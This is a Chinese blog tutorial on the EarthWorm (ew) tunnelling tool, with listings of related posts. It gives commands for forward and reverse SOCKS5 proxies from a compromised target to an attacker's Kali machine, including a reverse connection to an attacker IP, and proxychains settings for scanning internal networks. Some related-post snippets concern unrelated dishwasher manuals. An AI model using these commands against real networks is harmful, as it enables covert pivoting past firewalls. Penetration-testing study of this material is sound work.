ew使用方法

已于 2024-09-07 20:27:04 修改
阅读量295 收藏 1
点赞数
分类专栏: 漏洞利用 文章标签: 安全
于 2020-08-16 17:08:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44414845/article/details/108031849
版权

ew实战

详见博客,写的很好。这里重点说下文章中的场景一:把流量代理到攻击机,进行内网信息收集。

1.正向代理方式

目标机有公网IP(219.x.x.x),且可任意开监听端口(即开启的监听端口可在公网访问),可以使用正向的方式代理流量。在目标机上启动socks5服务并监听1080端口:

./ew -s ssocksd -l 1080

在这里插入图片描述

接着流量代理到219.x.x.x的1080端口,就相当于把流量代理到目标机了,就可以使用相关工具做进一步渗透。
攻击机kali上proxychains代理配置:

vi /etc/proxychains.conf
[ProxyList]
socks5    219.x.x.x    1080

然后就可以愉快的进行内网渗透了。
在这里插入图片描述

2.反向代理方式

1.由于目标机没有公网IP,但是能访问公网。因为目标机没有具体地址,无法使用正向连接,可使用反弹连接的方式代理流量。在攻击机本地启动流量转发,将来自外部1080端口的流量转发到本地8888端口,并等待目标反弹连接:

./ew_for_linux -s rcsocks -l 1080 -e 8888

在这里插入图片描述
2.在目标机上启动socks5服务,并反弹到攻击机的8888端口:

./ew -s rssocks -d 123.x.x.x -e 8888

在这里插入图片描述
3.代理通道架设完毕,访问攻击机的1080相当于访问目标机的8888端口,在攻击机上使用proxychain将流量代理到本地1080端口,相当于把流量代理到目标机上了,在攻击机上发起请求相当于在目标机上发起请求,然后可以使用相关工具做进一步渗透。
攻击机上proxychains代理配置:

[ProxyList]
socks5    127.0.0.1    1080

4.接下来可以愉快的用kali进行内网的渗透了。
在这里插入图片描述
注意:
1.由于proxychains无法代理icmp的数据包,要加上禁ping参数-Pn(不检测主机是否存活,直接进行端口tcp扫描)
2.如果攻击机不是公网的VPS kali,而是使用本地的主机,公网VPN作为中转,则在本地windows主机中使用windows代理工具,如Proxifier。

ew使用
课嗨教育的专栏
04-02 550
0x01 需求 当渗透进行到内网,常需要将流量代理到内网进行进一步扩展如: 端口扫描 端口转发 访问内网web服务 …… 0x02 场景 以下模拟一个使用场景。 1、环境配置、网络拓扑 A1 - 120.x.x.x - Kali - 公网攻击服务器 V1 - 10.10.1.111 - Centos - 内网服务器,对公网开放但无公网IP,80端口存在web应用,通过一台nginx对公网开放,现已获得webshell,路由可抵达1...
EW代理工具的使用说明
Ays.Ie的博客
05-18 2375
本篇介绍了ew代理转发工具,以及简单的应用
内网转发工具EW使用
Bird&Bird
12-22 4777
目录EW(EarthWorm)结合proxychains代理链EW正向代理EW反向代理 EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用,跨平台,任何平台都可以轻松使用EW(
EW使用
cxk
07-02 8922
EW使用 靶机 win7 192.168.5.101 攻击机 win 10 192.168.0.31 攻击机 kali 192.168.5.102 1)ew 自身的各个选项用途说明 -l 指定要监听的本地端口 -d 指定要反弹到的机器 ip -e 指定要反弹到的机器端口 -f 指定要主动连接的机器 ip -g 指定要主动连接的机器端口 -t 指定超时时长,默认为 1000 2)执行正向转发 在k...
Haier海尔家用洗碗机EW14718使用说明书用户手册图解图示pdf电子版下载.pdf
09-07
使用说明书详细介绍了产品的特点、安全事项、技术数据、操作方法以及维护保养等方面的知识,帮助用户更好地理解和使用这款洗碗机。 **产品特点** 海尔 EW14718 洗碗机具有以下特点: 1. 设计紧凑,节省厨房空间。...
Haier海尔家用洗碗机EW9818J使用说明书用户手册图解图示pdf电子版下载.pdf
09-07
使用方法: 1. **餐具摆放**:根据餐具的种类和大小,遵循说明书的建议进行摆放,确保水流能够充分接触每个餐具。 2. **程序使用**:洗碗机设有多种洗涤程序,如快速洗、强力洗、节能洗等,用户可根据餐具的污渍程度...
Haier海尔家用洗碗机EW130266BKD使用说明书用户手册图解图示pdf电子版下载.pdf
09-07
3. **使用方法**: - 漂洗剂指示灯亮起时需添加专用漂洗剂。 - 按照图示添加漂洗剂,液面不超过“max”标记。 - 洗碗粉(块)须远离儿童,避免误食。 4. **洗涤剂使用**: - 专用洗碗粉/洗涤块,不可使用普通盐...
等间距 EW方法 和 CAIM 生成多粒度数据
06-02
%%% Time:2022.06.15; Aim: 等间距 EW方法 和 CAIM 生成多粒度数据 %%% data: 输入的数据,包含最后的类别标签 %%% breakpoints:断点集合
IAR EW430软件的安装
07-14
5. 用户界面一致:EW430的用户界面和操作方法与其他IAR公司产品(如EW for ARM)保持一致,便于开发者学习和使用EW430的安装过程如下: 1. 首先要找到名为EW430-EV-web-5303的安装文件。安装过程中,若使用...
EW工具使用-----端口转发+流量转发
weixin_46062722的博客
02-25 3790
Earthworm工具 EW 是一套便携式的网络穿透工具,具有 SOCKS v5 服务架设和端口转发两大核心功能。该工具能够以 “正向”、“反向”、“多级级联” 等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内, 强烈推荐使用。官方地址:http://rootkiter.com/EarthWorm 该工具共有 6 种命令格式:(ssocksd、rcso
8月24日笔记(ew使用
最新发布
m0_74736832的博客
08-24 1065
EW(EarthWorm)是一套基于C语言开发的轻量级且功能强大的网络穿透工具,它支持Socks5代理、端口转发及端口映射等功能,能够在复杂的网络环境中实现高效稳定的网络穿透。这款全平台适用的工具(包括Windows、Linux和Mac系统)可以通过正向、反向或多级级联的方式建立网络隧道,直达目标网络位置,利用其特有的技术突破网络限制,有效绕过防火墙的阻隔。
【内网学习笔记】10、ew使用
TeamsSix 的 优快云 空间
06-10 6541
1、Socks 代理工具介绍 Socks 代理可以理解成升级版的 lcx,关于 lcx 的用法可以看我之前的文章: https://teamssix.com/year/210528-130449.html 但是 lcx 毕竟年代久远,现在的杀软基本也都能识别到了,因此在实战中不太推荐使用 lcx ,更推荐使用这些 socks 代理工具。 常见的 socks 代理工具有 ew、termite、frp、nps、sSocks、reGeorg、Neo-reGeorg、SocksCap、Proxifier、Proxy
EarthWorm(ew):复杂网络环境下端口转发及SOCKS5代理工具
ZL_1618的博客
08-14 2240
本文是在学习了下面参考文章的基础上,基于自己的理解和心得补充了数据流量拓扑图,这样更好理解工具的使用场景和记住命令;本文仅作为技术交流。1.耐下心来刚开始看到这个工具本想一看而过,后来耐心的学习一下,打开了新世界。2.动手实践看了很多文章也包括官方的文档;发现对小白来说想了解工具功能和不同场景,单看文字不直观,没有网络拓扑很难理解。所以本着自己边学习边记录边分享的精神,整理了这篇文章。3.横向比较3.1还发现了这个作者的另一个好用的工具Termite;目前EW和Termite作者已经不维护了;
内网穿透工具EW的简单使用(附内网环境实现)
markecheng的博客
12-15 9017
前言 EW全称叫做EarthWorm简称叫做EW,它是一套便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,并且包含着LCX工具的功能,可以再复杂的网络环境实现网络穿透 EW可以已正向和方向以及多级级联的方式建立网络隧道 这里示范简单的正向以及反向是实现过程 实现环境 目标,使用kali攻击机对windows 2008 R2目标服务器进行正向连接以及反向连接 过程 1.在EW工具包中,有很多版本,linux有32位的,以及64位的,首先我们需要输入以下命令来查看我们需要运行多少位的ew工具
【内网—内网转发】——代理转发_ew(Earthworm)代理转发
weixin_45588247的博客
09-11 6487
文章目录一、实验环境:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:2. 网络拓扑图:3. 说明:4. 实验过程:八、ew(Earthworm)反向代理:1. 一级代理:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程:2. 二级代理(一):2.1 场景:2.2 网络拓扑图:2.3 说明:2.4 实验过程: 一、实验环境: 角色 系统
隧道应用4-内网穿透EW的简单使用
Welcome To Myon'Blog !
01-14 953
使用另一台主机访问该主机的 8888 端口,该主机 IP 为192.168.249.1。lcx_slave/lcx_listen/lcx_tran + 端口转发参数。则会直接跳转到 192.168.249.129 的dvwa靶场服务。通过跳板机配置的端口转发进而访问到内网其他主机的服务。与netsh端口映射内网类似,也是通过跳板机实现。装好工具EW,这里以Windows版本做演示。停掉 ew ,再次访问,则无法加载页面。以上就是关于 ew 的一个简单用法。在 cmd 里面执行如下命令。
EW简单设置代理web服务器
The current road is different, love needs to distinguish between right and wrong
01-21 2848
正向代理 服务端我这里是在linux系统上进行监听的,使用的是阿里云的服务器。 ./ew_for_linux64 -s ssocksd -l 2222 #监听本地的2222端口 然后设置客户端,windows系统的话直接配置浏览器的代理或是使用类似proxifier的代理软件设置全局代理即可。 linux系统的话配置proxychains代理链的配置文件,设置成监听的ip和端口 vi /etc/proxychains4.conf 然后命令前面加上 proxy.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值